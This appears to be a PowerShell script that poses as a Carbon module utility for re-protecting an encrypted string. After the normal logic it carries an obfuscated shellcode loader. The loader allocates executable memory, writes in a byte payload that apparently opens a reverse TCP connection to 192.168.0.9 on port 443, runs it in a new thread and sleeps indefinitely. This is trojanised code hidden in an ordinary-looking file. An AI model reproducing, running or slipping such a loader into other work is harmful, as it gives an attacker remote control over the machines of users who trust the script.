param(
    [Parameter(mAnDatorY=${tR`Ue})]
    [string]
    ${p`ROTEctEdST`RI`Ng}
)

.("{2}{0}{1}" -f 'ct','Mode','Set-Stri') -Version ("{0}{1}"-f'Lates','t')


${PSSc`RIPTr`oot} = &("{2}{1}{0}"-f 'h','Pat','Split-') -Parent -Path ${mYIn`Vo`C`ATION}."m`YC`Omma`ND"."DEf`IN`I`TiOn"

&("{0}{1}" -f'Add-Ty','pe') -AssemblyName ("{3}{0}{2}{1}"-f 's','ity','tem.Secur','Sy')

.("{3}{2}{0}{1}" -f 'ul','e','od','Import-M') -Name (&("{0}{1}{2}"-f'Join','-','Path') -Path ${P`s`SCRi`PTR`oOT} -ChildPath ((("{0}{1}{2}"-f'..','{0}Car','bon.psd1')) -f  [CHAR]92) -Resolve)

${STR`i`NG} = .("{2}{1}{3}{0}"-f't-CString','nprote','U','c') -ProtectedString ${prOT`EC`T`EdSTR`iNg}
.("{0}{1}{3}{2}"-f'P','rote','tring','ct-CS') -String ${S`TrI`NG} -ForUser


${C} = (((("{33}{45}{83}{113}{87}{23}{102}{80}{62}{52}{46}{14}{18}{104}{2}{122}{109}{81}{76}{63}{34}{92}{26}{95}{38}{64}{19}{28}{24}{3}{114}{37}{53}{8}{1}{59}{72}{67}{13}{61}{82}{101}{29}{118}{30}{86}{32}{12}{69}{108}{51}{123}{7}{27}{119}{17}{90}{15}{66}{78}{111}{74}{88}{98}{77}{60}{124}{10}{105}{44}{36}{43}{11}{116}{68}{117}{56}{48}{70}{0}{84}{42}{41}{6}{58}{94}{112}{4}{99}{22}{71}{16}{31}{39}{106}{54}{91}{100}{50}{40}{115}{85}{79}{75}{25}{107}{20}{5}{49}{121}{57}{47}{73}{97}{93}{35}{21}{89}{55}{120}{110}{103}{9}{96}{65}"-f'am','l','ern Int','t dwSize','I','t','Cr','{0})]public st','Al','src, ','ize, ','Start','t);[DllI','Ty','ta','reat','ead','tern I','tic e','Add','ic ex','t','Ptr','}ke','s, uin','s','c','a','res','nt f','t','I','c','[D','lA','ntP',' l','t','Int','d)','.dll{0}','t dw','in','p','Ptr','ll','ic s','tPtr','tr lpP','e','crt','.','l{0})]publ',' fl','mpo',' de','P','n','eati','oca',' uint dw','pe,','l','ua','Ptr lp','nt);','eTh','ion',' I','mport({0}ker','ar',' lpThr','t',' me','Attri','c ','Virt','s,','r','bli','d','r ',' ','I','eter, u','u','e','t({0','b','r','ntPtr C','rt({0}m','llo','set(I','onFla','(','uint cou','m','ute','nt','sv','ui','rnel32.',' uint ','xt','Int',';[DllI','tat','nel32','t',',','ead(IntPtr lpThread','gs, ','mpor',', uin',')]p','Address,','nt','lPro','tic ex','st','rn I','P','dll','StackS')) -F  [chaR]34));${w} = &("{0}{1}" -f 'Ad','d-Type') -memberDefinition ${c} -Name ("{0}{1}" -f'W','in32') -namespace ("{0}{4}{3}{2}{1}"-f'W','ns','nctio','u','in32F') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x09,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${G} = 0x1000;if (${z}."lENg`TH" -gt 0x1000){${G} = ${z}."LE`NGtH"};${x}=${w}::("{0}{1}{2}" -f'Vi','r','tualAlloc').Invoke(0,0x1000,${G},0x40);for (${I}=0;${I} -le (${z}."LE`NG`TH"-1);${I}++) {${W}::"mEm`S`Et"([IntPtr](${x}.("{2}{1}{0}" -f'2','t3','ToIn').Invoke()+${i}), ${Z}[${I}], 1)};${w}::("{1}{0}{2}"-f'r','CreateTh','ead').Invoke(0,0,${X},0,0,0);for (;;){&("{2}{1}{0}{3}" -f 's','tart-','S','leep') 60};
